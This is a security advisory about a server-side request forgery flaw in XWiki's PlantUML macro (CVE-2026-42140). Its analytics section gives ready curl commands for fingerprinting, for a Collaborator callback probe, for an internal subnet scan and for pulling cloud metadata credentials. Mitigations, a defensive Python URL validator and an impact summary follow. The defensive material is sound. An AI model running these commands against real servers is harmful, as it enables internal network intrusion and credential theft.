XWiki, Server-Side Request Forgery, CVE-2026-42140 (moderate)


The vulnerability exists in the PlantUML Macro, a component that renders UML diagrams from simple text. The macro allows users to specify an alternative PlantUML server using the `server` parameter. However, versions prior to 2.4.1 do not validate the supplied URL. An attacker can leverage this by injecting a specially crafted URL into the `server` parameter. This URL can point to an internal IP address or a malicious external endpoint. The XWiki platform then attempts to connect to the attacker-controlled address to fetch the diagram. This action constitutes a Server-Side Request Forgery (SSRF) attack, as defined by CWE-918. The attack does not require any form of authentication or elevated privileges. The malicious request is sent directly from the vulnerable XWiki server. This allows an attacker to probe the internal network, bypassing traditional firewalls. The server’s request can be used to fingerprint or interact with internal services. For example, it could target a Redis instance, a Kubernetes API, or a cloud metadata service. The macro operates by performing an HTTP GET request to the concatenation of the host and path. An attacker could use this to exfiltrate data or launch further internal attacks. The attack is executed simply by viewing a wiki page containing the malicious macro. This makes it a potent vector for lateral movement within a network.
Platform: XWiki
Version: < 2.4.1
Vulnerability: Server-Side Request Forgery
Severity: Moderate (4.4)
Date: 2026-05-04

Prediction: 2026-05-15

What Undercode Say (analytics):

Identify vulnerable instances
curl -sk "https://target.xwiki/rest/wikis" | grep "version"
Test for SSRF using Burp Collaborator
curl -X POST "https://target.xwiki/bin/view/Main/" \
-d '{{plantuml server="http://burp.collaborator.net/ssrf"}}A->B: Test{{/plantuml}}'
Internal network scan via SSRF
for i in {1..254}; do
curl -sk "https://target.xwiki/bin/view/Main/" \
-d "{{plantuml server=\"http://10.0.0.$i:22\"}}A->B: Test{{/plantuml}}" \
| grep -q "Connection refused" || echo "Host 10.0.0.$i is reachable"
done
Exfiltrate AWS metadata
curl -sk "https://target.xwiki/bin/view/Main/" \
-d '{{plantuml server="http://169.254.169.254/latest/meta-data/"}}A->B: Test{{/plantuml}}'

Exploit:

To exploit the vulnerability, an attacker creates a new wiki page or modifies an existing one. The attacker inserts a PlantUML macro containing the malicious `server` parameter. The payload typically points to an internal resource, such as `http://169.254.169.254/latest/meta-data/` for cloud metadata or `http://internal-admin-panel:8080`. Upon saving and viewing the page, the XWiki server makes an HTTP GET request to the attacker-controlled URL. The attacker can then observe the response or use timing attacks to infer the presence of internal services. The exploit does not require any special privileges, making it a low-complexity attack.

Protection from this CVE

Upgrade the macro-plantuml extension to version 2.4.1 or later. If an immediate upgrade is not possible, disable the PlantUML macro entirely. Alternatively, restrict outbound network access from the XWiki server using a firewall. Place the XWiki server in a DMZ to isolate it from internal networks. Use a Web Application Firewall (WAF) to block requests containing suspicious `server` parameters. Regularly audit wiki pages for malicious macro injections. Implement strict input validation for the `server` parameter, allowing only trusted domains.
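The last two mitigations above (strict validation of the `server` parameter against trusted hosts, and auditing page source for macro injections) as an added example. This is not XWiki's or the macro-plantuml extension's own code, and it is written in Python rather than the extension's Java so it runs stand-alone. The trusted host names, the resolver table and the sample page content are all constructed for the example; `validate_server` takes the resolver as a parameter so the non-routable-address check can run offline.

```python
"""Added example (not XWiki / macro-plantuml code): allowlist validation of a
user-supplied PlantUML `server` URL, plus an audit pass over wiki page source
that flags plantuml macros whose server fails that validation."""
from __future__ import annotations

import ipaddress
import re
from typing import Callable, Iterable

from urllib.parse import urlsplit

# Assumption: hypothetical trusted PlantUML renderers for this organisation.
TRUSTED_SERVERS = {"plantuml.example.org", "www.plantuml.com"}
ALLOWED_SCHEMES = {"https"}


def _is_non_routable(ip: ipaddress.IPv4Address | ipaddress.IPv6Address) -> bool:
    """True for address ranges an SSRF target would typically sit in:
    RFC 1918 / ULA, loopback, link-local (incl. 169.254.169.254), reserved, multicast."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_server(url: str,
                    resolve: Callable[[str], Iterable[str]],
                    trusted: set[str] = TRUSTED_SERVERS) -> tuple[bool, str]:
    """Return (ok, reason) for a candidate `server` value.

    Order of checks: parse -> scheme -> no embedded credentials -> host on the
    allowlist -> every address the host resolves to is routable. The allowlist
    check already rejects literal IPs; the resolution check catches an
    allowlisted name whose DNS record points somewhere internal."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        # "https://trusted.host@10.0.0.5/" parses the real host as 10.0.0.5
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host.lower() not in trusted:
        return False, f"host {host!r} not in allowlist"
    for addr in resolve(host):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False, f"resolver returned non-IP {addr!r}"
        if _is_non_routable(ip):
            return False, f"{host} resolves to non-routable {addr}"
    return True, "ok"


# Matches the opening tag of a plantuml macro and captures its parameter list.
MACRO_RE = re.compile(r"\{\{plantuml\b([^}]*)\}\}", re.IGNORECASE)
SERVER_RE = re.compile(r"""\bserver\s*=\s*(?:"([^"]*)"|'([^']*)')""", re.IGNORECASE)


def audit_page(source: str,
               resolve: Callable[[str], Iterable[str]]) -> list[tuple[str, str]]:
    """Return (server_url, reason) for each plantuml macro in `source` whose
    server parameter fails validate_server. Macros without a server parameter
    use the configured default and are not user-controlled, so they are skipped."""
    findings: list[tuple[str, str]] = []
    for macro in MACRO_RE.finditer(source):
        match = SERVER_RE.search(macro.group(1))
        if not match:
            continue
        url = match.group(1) if match.group(1) is not None else match.group(2)
        ok, reason = validate_server(url, resolve)
        if not ok:
            findings.append((url, reason))
    return findings


def fake_resolver(host: str) -> list[str]:
    """Constructed DNS table so the example runs offline (not real records)."""
    table = {
        "plantuml.example.org": ["93.184.216.34"],   # a routable address
        "rebound.example.org": ["10.0.0.5"],         # allowlisted name pointing inside
    }
    return table.get(host, [])


# Constructed page source: one trusted server, one SSRF attempt, one default macro.
SAMPLE_PAGE = """= Architecture =
{{plantuml server="https://plantuml.example.org"}}A->B: ok{{/plantuml}}
{{plantuml server="http://169.254.169.254/latest/meta-data/"}}A->B: x{{/plantuml}}
{{plantuml}}A->B: default server{{/plantuml}}
"""

if __name__ == "__main__":
    for url, reason in audit_page(SAMPLE_PAGE, fake_resolver):
        print(f"FLAG {url}: {reason}")
```

The resolution check runs at validation time, so it does not by itself cover a record that changes between the check and the fetch; the HTTP client that finally fetches the diagram should connect only to the addresses that passed validation and should not follow redirects (or should re-validate each redirect target with the same function).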

Impact

An attacker can successfully exploit the SSRF vulnerability to probe internal network infrastructure. This allows the attacker to discover and interact with internal services that are not exposed to the public internet. Potential targets include internal databases, configuration management APIs, and cloud instance metadata services. By accessing the cloud metadata service, the attacker could retrieve instance credentials and temporary security tokens. The attacker may also use the vulnerability to perform port scans on internal hosts. This information can be used to pivot to other systems within the network. In the worst case, exploitation could lead to a full compromise of the internal environment.


Sources:

Reported By: github.com